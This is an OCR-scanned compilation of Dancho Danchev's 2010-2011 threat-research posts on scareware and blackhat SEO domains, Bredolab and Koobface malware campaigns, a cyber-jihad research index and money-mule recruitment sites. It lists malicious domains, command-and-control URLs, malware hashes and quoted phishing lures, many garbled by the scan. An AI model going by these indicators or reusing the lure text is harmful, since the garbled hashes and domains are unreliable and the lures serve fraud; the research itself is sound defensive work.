ioOyfyc8.ru - Email: molchanov@repairman.com 
j6yeky7p.ru - Email: bazhenov@krovatka.su 
j7k6xze2.ru - Email: vasilev@pop3.ru 
jimm2rusru.ru - Email: kustov@rapworld.com 
jimm4fan09.ru - Email: antonov@blida.info 
jimmjimm895.ru - Email: kuznecov@insurer.com 
jimmkolesoru.ru - Email: naumov@boarderzone.com 
jimmonlineO.ru - Email: miheev@gmail.com 
jimmplum2.ru - Email: vishnevskiy@pop3.ru 
jimmthebest1.ru - Email: aleksandrov@blackcity.net 
jnano5gh.ru - Email: zhukov@realtyagent.com 
jokerjokk.ru - Email: beglov@blida.info 
kefpvbsi.ru - Email: kalinin@boarderzone.com 
kfgemaae.ru - Email: ulyanov@bigmailbox.net 
kolianderru - Email: zaicev@insurer.com 
liononlinensd.ru - Email: nikitin@rastamall.com 
lokipol.ru - Email: kirikov@bikerheaven.net 
mjbims7m.ru - Email: pishkov@ravermail.com 
mrtOzqcb.ru - Email: shedrin@pochtamt.ru 
mxek5t5g.ru - Email: beglov@repairman.com 
nesselandeportal.info 

ni2m4kua.ru - Email: zhukov@bikermail.com 
nv8os6yt.ru - Email: kuznecov@mail.ru 
o3wg4sya.ru - Email: abakumov@bolbox.com 
ocggnaif.ru - Email: zaicev@iname.com 
ofz5qzgu.ru - Email: zaicev@ravermail.com 
oh7iumr7.ru - Email: belov@inorbit.com 


onlinefeeds.ru - Email: beglov@insurer.com 
onlinegearsd.ru - Email: luzgin@smtp.ru 
onlinejimmmovse.ru - Email: abakumov@realtyagent.com 
onlineonlkiok.ru - Email: kirillov@billssite.com 
pgvvua6j.ru - Email: goncharov@bicycling.com 
pororkol.ru - Email: erohin@bikerider.com 

prc6t7z3.ru - Email: kirikov@pochtamt.ru 

psxdvOnr.ru - Email: zhukov@inbox.ru 

pvbsiy5y.ru - Email: komarov@kinkyemail.com 
q3ysg05s.ru - Email: golodnikov@insurer.com 
qbecqeOs.ru - Email: ulyanov@bicycling.com 
qec5begqn.ru - Email: morozov@pochta.ru 

qfnye2t7.ru - Email: bednyakov@irow.com 
qpsxdvOn.ru - Email: viktorov@blackcity.net 
rikosdhu.ru - Email: pokatilov@pisem.net 
ronaldknol.ru - Email: taranov@smtp.ru 

rs3gpd0m.ru - Email: alekseev@bicycledata.com 
rudjimmdjimm.ru - Email: alekseev@boarderzone.com 
s4gvhd35.ru - Email: lebedev@blackvault.com 
s748eo0p4.ru - Email: aleksandrov@repairman.com 
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sgivnnot.ru - Email: volkov@repairman.com 
stpf6qpv.ru - Email: bednyakov@relapsecult.com 
sv4wmtxj.ru - Email: ivanov@bikerider.com 
t0a2afyq.ru - Email: ivanov@boatnerd.com 
t3tzynvj.ru - Email: bazhenov@rapstar.com 
trustincompanies.ru - Email: abdulov@insurer.com 
udfyfzjt.ru - Email: polovov@rbcmail.ru 
ucf47vnu.ru - Email: abdulov@bikerider.com 
uplcash.com - Email: director@climbing-games.com 
v5w3xgzn.ru - Email: morozov@rbcmail.ru 
vgksry7k.ru - Email: vishnevskiy@land.ru 
w8iroomb.ru - Email: golodnikov@pop3.ru 
x7p03g0j.ru - Email: kirikov@front.ru 

xni27ftd.ru - Email: timofeev@mail.ru 

xsd3id8t.ru - Email: kovalev@pochta.ru 
xthjrgxz.ru - Email: pokatilov@insurer.com 
xu44i03y.ru - Email: arhipov@insurer.com 
yiOewtmd.ru - Email: antonov@blackvault.com 
yp7007ngq.ru - Email: golodnikov@rbcmail.ru 
z26hggcb.ru - Email: pokatilov@fromru.com 
z656cvje.ru - Email: slabkov@boatnerd.com 
zsrd4xj5.ru - Email: kuznecov@iname.com 
zznks8fh.ru - Email: bulaev@registerednurses.com 
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3513ev2oyweycrizlyo3.com 


4idmexiczdyS2yh7rkib.com A 


S6mi7704710x6wmSvey.com 


Sysgzuu084e9i8ohiSnn.com 


aatyamikpgxpshimi7kycom 


bytpvunifooesi946d2p.com 


MOSzsht33cd4itcqvh.com 


inn72w76khysuxdgjObo.com 


k78juShyzratnadcSr7m.com | 
| 
! 
Irbx4nzznbdmedik4erd.com . 4 
200,63.44.48 et 200,63.44.024 ——S-pe AS27716 
tsleepnz784nidSéprn.com : “ 


nOim7ih7 qscrtsesilicom 

pdusxsivedamjcS3qipi.com 
rabotaetpolubomu.net 

tovaredsivvépmo488k9 com 
thmybOs6seStebsOgnb&.com 
u5a0Sqldnamrépwarnav3.com 
uqiwedgStrS23wbatdzp.com 
wk4j2x7né9nqglilsvwnsn.com 


ysutSox0S4w2dddjtswh.com 


Could we have a blackhat SEO campaign, without a Koobface gang connection? Appreciate my 
rhetoric. Parked at 200.63.44.48, again within AS27716, ASEVELOZ Eveloz are the following 
domains: 

3513cv2oywwycrfzlyo3.com - Email: michaeltycoon@gmail.com 

4idmcxiczdy52yh7rklb.com - Email: michaeltycoon@gmail.com 

56m17zj04710x6wm9v6y.com - Email: michaeltycoon@gmail.com 
8vsgzuu084e9i8ohI5nn.com - Email: michaeltycoon@gmail.com 
aatyamlkpgxp8h3m17ky.com - Email: michaeltycoon@gmail.com 
bvzpvunifooe8t946d2p.com - Email: michaeltycoon@gmail.com 

i905jzsht33cd4kfcqvh.com - Email: michaeltycoon@gmail.com 

jhn72w76khysuxdgjObo.com - Email: michaeltycoon@gmail.com 

k78ju8lyzratna0c5r7m.com - Email: michaeltycoon@gmail.com 

Irbx4hzznbdmedfk4xrd.com - Email: michaeltycoon@gmail.com 

Isleepnzj784nid96prn.com - Email: michaeltycoon@gmail.com 
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nOitv7fh7qscrfse3ili.com - Email: michaeltycoon@gmail.com 
pdusxsiuedamjc83qlpi.com - Email: michaeltycoon@gmail.com 
rabotaetpolubomu.net - Email: michaeltycoon@gmail.com 
t0vqred4itv4pmo488k9.com - Email: michaeltycoon@gmail.com 
thmybOs6se5febsOghb8.com - Email: michaeltycoon@gmail.com 
u5a05qldnmr4jwqrnav3.com - Email: michaeltycoon@gmail.com 
uqlwedg9tr523wbafdzp.com - Email: michaeltycoon@gmail.com 
vk4j2x7n49nq1il9vm5h.com - Email: michaeltycoon@gmail.com 
ysut5gx094w2dddjtswh.com - Email: michaeltycoon@gmail.com 


Deja vu! Where do we know the michaeltycoon@gmail.com email from? From the "[13]A 
Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang" 
Campaign, and in particular from the fact that it was once directly connected to the Koobface 
gang - this is not an email that was used to register a domain belonging to the scareware 
affiliate network, instead it’s an email used to register a client-side exploits serving domain 
parked on the same IP where a hardcore Koobface C &C from Koobface 1.0’s infrastructure 
was responding to - urodinam.net 


¢ [14]Dissecting the Mass DreamHost Sites Compromise - "Moreover, on the exact same IP 
where Koobface gang’s urodinam.net is parked, we also have the currently active 1zab- 
slwvn538n4i5tcjl.com - Email: michaeltycoon@gmail.com, serving client side exploits 
using the Yes Malware Exploitation kit - 91.188.59.10 /temp/cache/PDF.php; admin 
panel at: lzabslwvn538n4i5tcjl.com /temp/admin/index.php" 


Blackhat SEO campaigns, migration from the Koobface-friendly AS31252, STARNET-AS StarNet 
Moldova, plus a direct connection established as once a customer is migrating, he’s usually 
taking all of his dirty luggage with him, proves that, there’s no such thing as coincidence within 
the cybercrime ecosystem, there’s just a diverse infrastructure where everyone appears to 
be self-serving their needs as a service, consequently forwarding responsibility for someone 
else’s actions to the infrastructure they are abusing. 


Related blackhat SEO/scareware monetization assessments: 

[15]Dissecting the 100,000+ Scareware Serving Fake YouTube Pages Campaign 
[16]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign - Part Two 
[17]Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware 

[18]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding 
[19]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign 

[20]The ultimate guide to scareware protection 

[21]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface 
Gang 

[22]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 

[23]A Peek Inside the Managed Blackhat SEO Ecosystem 

[24]Dissecting a Swine Flu Black SEO Campaign 

[25]Massive Blackhat SEO Campaign Serving Scareware 

[26]From Ukrainian Blackhat SEO Gang With Love 

[27]From Ukrainian Blackhat SEO Gang With Love - Part Two 

[28]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and 
Blackhat SEO Farms 

[29]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 
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[30]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 


This post has been reproduced from [31]Dancho Danchev’s blog. Follow him 
[32]Jon Twitter. 


_ ftp: //adanchev blogspot .con/2010/08 /koobiace-redirectors-and-scarevare hal 
_hetp://adanchev blogspot .con/2010/04/dissecting-Koobface- gangs-Latest html 
. http: //ddanchev. blogspot . com/2010/05/koobface-gang-responds-to-10-things-you.html 
_http://adanchev blogspot .con/2010/05/fron-koobtace- gang With- scarevare. ntl 


Au RWN HE 


ttp://www.virustotal.com/file-scan/report .html?id=7272f889520cd1d1898ccd91f 1b01835cf£53f06b452041baae0336 


96ff09Ffd7- 1281703284 

7. http://ddanchev. blogspot .com/2010/08/spamvertised-best-buy-macys-evite-and.htm 
8. http: //pastebin.com/PQUKr7aE 
9 


: ttp://3.bp.blogspot.com/_wICHhTiQmrA/TGVGu7Epj 11I/AAAAAAAAEZ0/oaThbJEDFcU/s1600/Blackhat_SEO_Dutch_Swiss_ 
10. 


11. http://ddanchev. blogspot .com/2010/07/exploits-malware-and-scareware-courtesy.htm 


Pie 


12. http://ddanchev. blogspot .com/2010/07/exploits-malware-and-scareware-courtesy.htm 
13. http://ddanchev. blogspot .com/2010/02/diverse-portfolio-of-scarewareblackhat.htm 
14. http://ddanchev. blogspot .com/2010/05/dissecting-mass-dreamhost-sites.html 

15. http: //ddanchev. blogspot .com/2010/06/dissecting- 100000-scareware-serving. htm 

16. http://ddanchev. blogspot .com/2010/06/dissecting-ongoing-us-federal-forms.htm 

17. http://ddanchev. blogspot .com/2009/08/blackhat-seo-campaign-hijacks-us.htm 

18. http://ddanchev. blogspot .com/2009/08/us-federal-forms-blackhat-seo-themed. htm 
19. http://ddanchev. blogspot .com/2009/08/dissect ing-ongoing-us-federal-forms.htm 


ttp://www.zdnet .com/blog/security/the-ultimate-guide-to-scareware-protection/429 


21. http://ddanchev. blogspot .com/2010/02/diverse-portfolio-of-scarewareblackhat.htm 
22. http://ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 
23. http://ddanchev. blogspot . com/2009/06/peek- inside-managed-blackhat-seo.htm 


. http: //ddanchev. blogspot .com/2009/05/dissecting-swine-flu-black-seo-campaign.htm 

; 
ttp://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with. html 
ttp://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


28. http: //ddanchev. blogspot . com/2009/06/from-ukraine-with-scareware-serving .htm 
29. http: //ddanchev. blogspot .com/2009/07/from-ukraine-with-bogus-twitter.htm 


ttp://ddanchev. blogspot .com/2009/06/fake-web-hosting-provider-front-end-to.htm 


N 
ul 


31. http://ddanchev.blogspot.com/ 
32. http://twitter.com/danchodanche 
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6.9 September 


6.9.1 Historical OSINT: Celebrities Death, Fedex Invoices, Office-Themed Malware 
Campaigns (2010-09-08 21:07) 


Dear, 

Unfortunately we failed to deliver the postal package you have sent on the 27th of 
July in time because the recipient's address is erroneous, Please print out the 
invoice copy attached and collect the package at our office. 


* This Site is protected by copyright and trademark faws under US and International faw- 
All rights reserved.©) 1995-2010 FedEx 


[1]As promised, this would be a pretty short historical OSINT post - catching up is in progress - 
detailing the structure of several campaigns that took place throughout July-August, 2010, and 
(as always) try to emphasize on the connection with historical malware campaigns profiled on 
my personal blog. 


Campaigns of notice include: spamvertised "Celebrities death-themed emails", "Fedex 
shipment status themed invoices", and "Office-themed documents". 


Sample subjects: 

Angelina Jolie died; Gwen Stefani died; Oprah Winfrey died; Tom Cruise died; Application; 
Thursday Journal Club; End Of Rotation; Abstracts; Project Declaration; Residency Happy Hour: 
SOP _POLICIES; Fwd: Updated Journal Club Handout 


Sample attachments: 
journal club articles.zip; Rotation Input Sheet.zip; ppi and c dif.zip; MSpeck.zip; Residen- 
cyPrep.zip; speck Case presentation draft.zip; journal club template.zip 


Detection rates, phone back URLs, and connections with previously profiled campaigns: 
- [2]news.exe - Trojan.Bredolab-993 - 40/ 43 (93.0 %) 

MD5: 44522def7cf2a42aa26f59c2ac4ced58 

SHA1: 2f60531b6e33d842eba505f3c3cb81la3ff6e3eb6a 


- [3]journal club articles.exe - Backdoor/Bredolab.edb - 41/ 43 (95.3 %) 
MD5: 72e90fd1264e731109d1b6b977b2c744 
SHAI1: 0a36b882d1b4d8b42cc466ec286e95bbb2e77d49 


Upon execution, the samples phone back to: 
188.65.74.161 /mrmun __sgjlgdsjrthrtwg.exe - AS42473 - DOWN 
194.28.112.3 /outlook.exe - AS48691 - ACTIVE 


- [4Joutlook.exe - TrojanSpy:Win32/Fitmu.A - 17/ 43 (39.5 %) 
MD5: 8f4eca49b87e36daae14b8549071dece 
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SHAI1: 1d390e9f8d6e744ead58dd6c424581419f732498 


Upon execution, the dropped sample phones back to: 
cuscuss.com - 188.65.74.164 - Email: info@blackry.com 


blackry.com 


cuscuss.com 
188.65.72.0/21 ——4S-g» as42473 


188.65.74.164 


depenam.com 


fishum.com 


Responding to 188.65.74.164 at AS42473 are also: 
wiggete.com - Email: info@blackry.com 
depenam.com - Email: info@blackry.com 
fishum.com - Email: info@blackry.com 
blackry.com - Email: info@blackry.com 


Two of the domains are know to have been serving client-side exploits, but the redirec- 
tion is currently returning an error "Connect to 188.40.232.254 on port 80 ... failed". 


- depenam .com/count22.php 
- blackry .com/count21.php 
- vseohuenno .com/trans/b3/ - 188.40.232.254 - Email: latertrans@gmail.com 


Responding to 188.40.232.254, AS24940 are also the following command and control, 
client-side exploit serving domains: 

gurgamer.com - (New IP: 86.155.172.30) Email: latertrans@gmail.com 

moneybeerers.com - Email: latertrans@gmail.com 

daeshnew.com - (New IP: 86.145.158.90) Email: latertrans@gmail.com 

volosatyhren.com - Email: latertrans@gmail.com 

vyebyvglaz.com - Email: latertrans@gmail.com 


- [5]FedexInvoice EE776129.exe - Win32/Oficla.LK - 41/ 43 (95.3 %) 
MD5: d4e2875127f5cbdf797de7f1417f96a7 
SHAI: c2df8d8c178142ba7bee48dbf9a9f68c32al4f5e 


Upon execution, the sample phones back to: 

ilovelasvegas __ .ru/web/St/bb.php?v=200 &id=636608811 &b=24augNEW &tm=— - 
109.196.134.44, AS39150 - Email: vadim.rinatovich@yandex.ru with x5vsm5.ru - Email: 
vadim.rinatovich@yandex.ru also parked there. 


Where do we know the vadim.rinatovich@yandex.ru email from? From two previously 
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profiled campaigns "[6]Spamvertised iTunes Gift Certificates and CV Themed Malware 
Campaigns"; and "[7]Dissecting the Xerox WorkCentre Pro Scanned Document Themed 
Campaign" having a direct relationship with the Asprox botnet. 


This post has been reproduced from [8]Dancho Danchev’s blog. Follow him 
[9]Jon Twitter. 


1. http: //twitter.com/danchodanchev/status/23254748308 


2. http://www.virustotal.com/file-scan/report .htm1?id=261fef 0647 1£b9a90928e21e027cb058cc84a0c310995f3ca95ce0 


6bea8f98cf-128396157 


3. http://www.virustotal.com/file-scan/report .html?id=£6c4e7472681ae9ea4a0c19cf£d75c5ce86477 e4£48612e543b219b 


c23d5c9d29- 1283961571 


4. ttp://www.virustotal.com/file-scan/report.htm1?id=616bc4458686384081be9a9b654a8b99b4 cbbbf 395b4650d01d4bc 


fe798119b4-128396215 


5. http://www.virustotal.com/file-scan/report.html?id=01f7ee45f£242de43£733c15e0238ca09bicf8fe9ec8c7ca7f4b95c 


a7959c2934- 1283961566 


6. http: //ddanchev. blogspot .com/2010/05/spamvertised-itunes-gift-certificates htm 


7. http: //ddanchev. blogspot .com/2010/07/dissecting-xerox-workcentre-pro-scanned.htm 


8. http: //ddanchev. blogspot .com/ 
9. http://twitter .com/danchodanche 


6.9.2 Summarizing 3 Years of Research Into Cyber Jihad (2010-09-11 16:24) 


From the "been there, actively researched that" department. 


. [1]Tracking Down Internet Terrorist Propaganda 

. [2]Arabic Extremist Group Forum Messages’ Characteristics 
. [3]Cyber Terrorism Communications and Propaganda 

. [4]A Cost-Benefit Analysis of Cyber Terrorism 

. [5]Current State of Internet Jihad 

. [6]Analysis of the Technical Mujahid - Issue One 

. [7]Full List of Hezbollah’s Internet Sites 


. [8]Steganography and Cyber Terrorism Communications 
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. [9]Hezbollah’s DNS Service Providers from 1998 to 2006 
10. [10]Mujahideen Secrets Encryption Tool 


11. [11]Analyses of Cyber Jihadist Forums and Blogs 
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12. 
13; 
14. 
15. 
16. 
17; 
18. 
19. 
20. 
21. 
22. 
23. 
24. 
25. 
26. 
27. 
28. 
29. 
30. 
31. 
32. 
33. 
34. 
35. 
36. 
37. 
38. 
39. 


[12]Cyber Traps for Wannabe Jihadists 
[13]Inshallahshaheed - Come Out, Come Out Wherever You Are 
[14]GIMF Switching Blogs 

[15]GIMF Now Permanently Shut Down 

[16]GIMF - "We Will Remain" 

[17]Wisdom of the Anti Cyber Jihadist Crowd 
[18]Cyber Jihadist Blogs Switching Locations Again 
[19]Electronic Jihad v3.0 - What Cyber Jihad Isn’t 
[20]Electronic Jihad’s Targets List 

[21]Teaching Cyber Jihadists How to Hack 

[22]A Botnet of Infected Terrorists? 

[23]Infecting Terrorist Suspects with Malware 
[24]The Dark Web and Cyber Jihad 

[25]Cyber Jihadist Hacking Teams 

[26]Two Cyber Jihadist Blogs Now Offline 
[27]Characteristics of Islamist Websites 

[28]Cyber Traps for Wannabe Jihadists 
[29]Mujahideen Secrets Encryption Tool 

[30]An Analysis of the Technical Mujahid - Issue Two 
[31]Terrorist Groups’ Brand Identities 

[32]A List of Terrorists’ Blogs 

[33]Jihadists’ Anonymous Internet Surfing Preferences 
[34]Sampling Jihadists’ IPs 

[35]Cyber Jihadists’ and TOR 

[36]A Cyber Jihadist DoS Tool 

[37]GIMF Now Permanently Shut Down 
[38]Mujahideen Secrets 2 Encryption Tool Released 


[39]Terror on the Internet - Conflict of Interest 
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This post has been reproduced from [40]Dancho Danchev’s blog. Follow him [41]Jon 
Twitter. 


stp: //adanchev blogspot .cou/2008/06/tracking- dow internet-tervorist. bial 
_hetp:/ /adanchev blogspot. con/2006/05/arabic-extreniat~group-forun-neseages ital 
_http://adanchev blogspot .con/2006/06/cyber~terrorien-conmnicat ions-and_22. heal 
. http: //ddanchev. blogspot . com/2006/10/cost-benefit-analysis-of-cyber.html 


ttp://ddanchev. blogspot .com/2006/12/current-state-of-internet- jihad. html 


ttp://ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one. html 


http: //ddanchev. blogspot .com/2006/12/full-list-of-hezbollahs-internet-sites.htm 


_hetp://adanchev. blogspot. cos/2006/08/steganography-and-cyber~terrorise. ht 
Foca pot cont) ntantcte ne apcesce peoecany aoa Maal 
10, hvtp://adanchev. blogspot con/200T/04/aujahideen-secrets~encryption-tool.htal 

. http: //ddanchev.blogspot .com/2007/08/analyses- of-cyber- jihadist-forums-and.htm 
12, ftp: //edunchevbogepet, cou/200T/0S/ cyber twapertor-vansebe"jimadiota heal 
http: //ddanchev .blogspot . com/2007/08/gimf-now-permanent1y-shut~ down . htm] 


14. http: //ddanchev.blogspot.com/2007/07/gimf-switching-blogs .htm 


http: //ddanchev. blogspot. com/2007/08/gimf-now-permanently-shut-down. htm 
http: //ddanchev.blogspot.com/2007/08/gimf-we-will-remain.htm 


. http: //ddanchev.blogspot .com/2007/10/wisdom-of-anti-cyber-jihadist-crowd.htm 
. http: //ddanchev.blogspot .com/2007/11/cyber- jihadist-blogs-switching. htm 
. http: //ddanchev.blogspot.com/2007/11/electronic-— jihad-v30-what-cyber- jihad. htm 


20. http: //ddanchev. blogspot .com/2007/11/electronic-jihads-targets-list .htm 


. http: //ddanchev. blogspot .com/2007/11/teaching-cyber- jihadists-how-to-hack. htm 


22. http: //ddanchey. blogspot .con/2007/11 botnet of-infected- terrorists. html 
| http://adanchey blogspot .con/2007/08/infecting-terrorist- suspects-vith. heal 

24, jeep: //ddanchev. blogspot .con/2007 /09/dazk-veb~and- cyber~jahad. neal 
_http://adanchey blogspot .con/2007/12/cyber- jihadist-hacking-veans. ital 


. http: //ddanchev. blogspot .com/2007/09/two-cyber- jihadist-blogs-now- offline. htm 


. http: //ddanchev. blogspot .com/2007/02/characteristics-of-islamist-websites.htm 


28. http: //ddanchev. blogspot .com/2007/03/cyber-traps-for-wannabe- jihadists .html 
29. http: //ddanchev. blogspot .com/2007/04/mujahideen-secrets-encryption-tool.htm 


. http: //ddanchev. blogspot .com/2007/06/analysis-of-technical-mujahid-issue-two.htm 
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22. 

. http: //ddanchev. blogspot .com/2007/05/jihadists-anonymous-internet-surfing.htm 
34, 
_hetp://adanchey. blogspot. con/2007/0T /cyeerjshadists-and-tor al 
36. 

; 


http: //ddanchev. blogspot. com/2007/08/gimf-now- permanent 1ly- shut-down. htm 
http: //ddanchev. blogspot. com/2008/01/mujahideen-secrets-2-encryption-tool .htm 


. http: //ddanchev. blogspot .com/2008/03/terror-on-internet-conflict-of-interest .htm 


40. http: //ddanchev.blogspot.com/ 
41. http: //twitter.com/danchodanche 
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2011 


7.1 January 


7.1.1 Top Ten Must-Read DDanchev Posts For 2010 (2011-01-22 00:25) 


Dancho Danchev's Blog - Mind Streams of 
Information Security Knowledge 


SATURDAY, SCPTEMBCAR 11, 2010 


© Summarizing 3 Years of Research Into Cyber Jihad 


Bis: [* Ee 


From the “been there, actively researched thal Gepartment. 


1 
2. 
3. 
4 
5. 
6 
?. 
a 
9. 


FeedBurner FeedCount 


01. [1]How the Koobface Gang Monetizes Mac OS X Traffic 
02. [2]AS50215 Troyak-as Taken Offline, Zeus C &Cs Drop from 249 to 181 
03. [3]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
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04. [4]The Avalanche Botnet and the TROYAK-AS Connection 

05. [5]Koobface Gang Responds to the "10 Things You Didn’t Know About the Koobface Gang 
Post" 

06. [6]Sampling Malicious Activity Inside Cybercrime-Friendly Search Engines 

07. [7]GazTransitStroy/GazTranZitStroy: From Scareware to Zeus Crimeware and Client-Side 
Exploits 

08. [8]Dissecting Northwestern Bank’s Client-Side Exploits Serving Site Compromise 

09. [9]U.S. Treasury Site Compromise Linked to the NetworkSolutions Mass WordPress Blogs 
Compromise 

10. [10]TorrentReactor.net Serving Crimeware, Client-Side Exploits Through a Malicious Ad 


This post has been reproduced from [11]Dancho Danchev’s blog. 


ibtp://adanchev ;blogepot.con/2010/02/noy-koobface-gang-nonstizes-nac-os-x_ bial 
_ het: / /Adanchev blogspot .con/2010/03/as50215~ troyak-as~taken~offline~zeus~c. heal 
| http://adanchev blogspot .con/2010/04/dns~infrastructure-of-noney-mule. hea! 

| http: //adanchev blogspot. con/2010/05/avalanche-botnet~and~ troyakas.héml 


ttp://ddanchev. blogspot .com/2010/05/koobface-gang-responds-to-10-things-you. htm 


ttp://ddanchev. blogspot .com/2010/07/sampling-malicious-activity-inside.htm 


. http: //ddanchev. blogspot .com/2010/03/gaztransitstroygaztranzitstroy-from.html 


ttp://ddanchev. blogspot .com/2010/04/dissecting-northwestern-banks-client .html 
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ttp://ddanchev. blogspot .com/2010/05/us-treasury-site-compromise-linked-to.htm 


10. http: //ddanchev.blogspot .com/2010/05/torrentreactornet-serving-crimeware.htm 
11. http://ddanchev.blogspot.com/ 
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7.1.2 Top Ten Must-Read Posts at ZDNet’s Zero Day for 2010 (2011-01-22 12:06) 


Join the largest community of IT 
Professionals on the web. 


ZDNet members receive FREE access to: 


All-star team of technology experts debvering 
dozens of reports day 


0+ wihkte Papers, Case stuches and wet<asts 


400,000+ downloads featunng srets 
execntadiles, and other time-saving tools 


100,000+ produxts reviewed from around the web 


Informative newsletters covering a wide variety of 
topics 


Breaking IT alerts as the news happens 


01. [1]Seven myths about zero day vulnerabilities debunked 

02. [2]Should a targeted country strike back at the cyber attackers? 

03. [3]5 reasons why the proposed ID scheme for Internet users is a bad idea 
04. [4]Hotmail’s new security features vs Gmail’s old security features 

05. [5]Attack of the Opt-In Botnets 

06. [6]From Russia with (objective) spam stats 

07. [7]The current state of the crimeware threat - Q &A 

08. [8]Mac OS X SMS ransomware - hype or real threat? 

09. [9]10 things you didn’t know about the Koobface gang 

10. [10]Google-China cyber espionage saga - FAQ 


This post has been reproduced from [11] Dancho Danchev’s blog . 


1. bttp://www.zdnet .com/blog/security/seven-myths-about-zero-day-vulnerabilities-debunked/7026 

2. http: //www.zdnet .com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194 

3. http://www.zdnet .com/blog/security/5-reasons-why-the-proposed-id-scheme-for-internet-users-is-a-bad-idea/ 
6527 

4. http://www. zdnet .com/blog/security/hotmails-new-security-features-vs-gmails-old-security-features/6509 

5. http://www.zdnet .com/blog/security/attack-of-the-opt-in-botnets/6268 
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. http://www.zdnet .com/blog/security/from-russia-with-objective-spam-stats/581 


. http://www.zdnet .com/blog/security/the-current-state-of-the-crimeware-threat-q-a/579 


. http://www. zdnet .com/blog/security/mac-os-x-sms-ransomware-hype-or-real-threat/5731 


. http: //www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 


. http://www.zdnet.com/blog/security/google-china-cyber-espionage-saga-faq/5259 


11. http://ddanchev.blogspot.com/ 


7.1.3 Spamvertised "Your password has been stolen!" Malware Campaign Circulat- 
ing (2011-01-26 20:30) 


facebook. 


A currently ongoing spamvertised campaign, attempts to impersonate the most popular social 
networking site, Facebook. 


Using a well proven "Your password has been stolen!" theme, the campaign entices the 
end user into downloading and executing the malware. Social engineering-driven campaigns 
targeting Facebook, remain among the popular malware campaign spreading techniques due 
to the ease of execution. 


Subject: Facebook Support. Your password has been stolen! 1D50888 
Message: Good afternoon. 


A Spam is sent from your FaceBook account. 


Your password has been changed for safety. Information regarding your account and a 
new password is attached to the letter.Read this information thoroughly and change the pass- 
word to complicated one. Please do not reply to this email, it’s automatic mail notification! 
Thank you for your attention. Your Facebook! 


Spamvertised filedname: Facebook details ID76803.zip (32,458 bytes) 


Detecrion rate: 

Facebook details.exe - [1]Trojan-Downloader:W32/Koobface.HV - 12/ 43 (27.9 %) 
MD5 : f0e7a8c264fe14562ca8ac98abb35840 

SHA1 : f68d15e66590c69ac75c46a09ae4 95 be8bbf231f 
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SHA256: 3ca757bfdecbee20ec10d5af770700041f4bc1b17ee3123f4d85acfd19elbb74 


Upon execution, the sample phones back to: 
Phones back to: 

interviewbuy.ru /forum/document.doc 
interviewbuy.ru /forum/load.php?file=0 
interviewbuy.ru /forum/load.php?file=1 
interviewbuy.ru /forum/load.php?file=2 
interviewbuy.ru /forum/load.php?file=3 
interviewbuy.ru /forum/load.php?file=4 
interviewbuy.ru /forum/load.php?file=5 
interviewbuy.ru /forum/load.php?file=6 
interviewbuy.ru /forum/load.php?file=7 
interviewbuy.ru /forum/load.php?file=8 
interviewbuy.ru /forum/load.php?file=9 
interviewbuy.ru /forum/load.php?file=ftpgrabber 
interviewbuy.ru /forum/load.php?file=pokergrabber 


interviewbuy.ru - 91.204.48.96 (AS24965); 124.217.248.229 (AS45839) Email: serv- 
man1976@yandex.ru 


ZeuS crimeware activity at [2]AS24965 (SPOINT-AS S.Point LTD) as well as [3]SpyEye 
malicious activity is also observed. 


This post has been reproduced from [4]Dancho Danchev’s blog. 


1 
2, https ://zoustracker abuse, ch/onitorphp?as-24968 

3, https: //apyeyetracker. abuse..ch/aonitor .php?aa=24969 

4. http://ddanchev. blogspot . com/ 
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7.1.4 Keeping Money Mule Recruiters on a Short Leash - Part Five (2011-01-31 12:58) 


Home About the Company Products Articles Links Contact Us 


New Arrivals: 


Welcome to Schwartz & Brothers LLC Authorization 


Enter lo partners area 
Looking to buy art? Sell art? Schwartz & Grothers LLC is the first choice for arists and buyers alike! Sctwwart 


4 Login: * 
& Brothers LLC is an effective tool for the artist and emerging artist to market and promote their artin a 

. 
professional and inexpensive manner. Ye will market your art to the international cormmunity of art buyers Password: | Login | 
Whether you ; King to Duy or sell original art, Sctwwartz & Brothers LLC ts the premier art site for those 


Regist ation Forgot Password? 
seeking to buy or sell original art online 


40 COMMISSIONS! Whether you are looking to Duy art or sell art, our site is fully Optimized to get result 


FAST! Schwartz & Brothers LLC 


is te future of buying a elling original art online. Artis 


sell their original art will re or artists, selling your arth 


Latest projects 


easter, faster, or more cost ginal art DIRECTLY to buyers wor 


with NO COMMISSIONS. Those wishing to buy art online are invited to browse our extensive online galleries © Leontd and Rimma Brailowsky (Russian, 


With money mule recruitment continuing to represent the most actively used risk-forwarding 
tactic within the cybercrime ecosystem for the purpose of securely distribution fraudulently 
obtained funds, part five of the "[1]Keeping Money Mule Recruiters on a Short Leash" series 
are here to stay. 


What’s particularly interesting about the money mule recruitment domain portfolio that 
I’ll expose, is the logical progression from bogus companies offering financial services, to a 
diverse set of companies occupying multiple markets/covering different market segments. 


- Current trends - Localization and standardization/template-tization 
A great example of this trend - largely driven by the [2]standardization and template-zation of 
money mule recruitment sites as a service- is Schwartz & Brothers LLC (schwartz-brothers.cc). 


"Schwartz & Brothers LLC is the first choice for artists and buyers alike! Schwartz & 
Brothers LLC is an effective tool for the artist and emerging artist to market and promote their 
art in a professional and inexpensive manner. We will market your art to the international 
community of art buyers. Whether you are looking to buy or sell original art, Schwartz & 
Brothers LLC is the premier art site for those seeking to buy or sell original art online." 
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Time start 16:40:28 Time elapsed: 00:04:51 


Are you an Australian citizen? 


Answer choices 


